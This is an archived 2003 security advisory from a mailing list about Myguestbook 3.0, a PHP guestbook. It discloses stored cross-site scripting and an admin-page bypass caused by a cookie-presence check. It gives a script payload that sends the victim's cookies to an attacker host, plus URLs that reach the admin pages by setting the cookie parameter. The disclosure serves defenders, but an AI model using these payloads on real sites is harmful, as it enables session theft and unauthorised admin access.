Vulnwatch mailing list archives
Myguestbook (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Fri, 21 Feb 2003 08:02:58 +0100
Informations : °°°°°°°°°°°°°° Version : 3.0 Website : http://www.tefonline.net/ Problems : - XSS -> admin infos recovery - Access to admin pages PHP Code/Location : °°°°°°°°°°°°°°°°°°° If pseudo = [SCRIPT], e-mail = >[SCRIPT] or message = </textarea>[SCRIPT][SCRIPT] will be executed on index.php, /admin/user_modif.php, /admin/admin_modif.php and /admin/admin_suppr.php .
/admin/confirm_connect.php : --------------------------------------------- SetCookie("Myguestbook","$name:$password"); ---------------------------------------------/admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and /admin/admin_suppr.php :
-------------------------------------------------------------------- <? if(!isset($Myguestbook)) header("location:../index.php?MSG=permis"); ?> -------------------------------------------------------------------- Exploits : °°°°°°°°°° [SCRIPT] : <script> location='http://[attacker]/file.php?'+document.cookie; </script> http://[target]/admin/admin_index.php?Myguestbook=1 http://[target]/admin/admin_pass.php?Myguestbook=1 http://[target]/admin/admin_modif.php?Myguestbook=1 http://[target]/admin/admin_suppr.php?Myguestbook=1 http://[target]/admin/user_modif.php?id=[MESSAGEID] Solution : °°°°°°°°°° A patch can be found on http://www.phpsecure.org. More Details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/Myguestbook.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyguestbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________
Current thread:
- Myguestbook (PHP) Frog Man (Feb 21)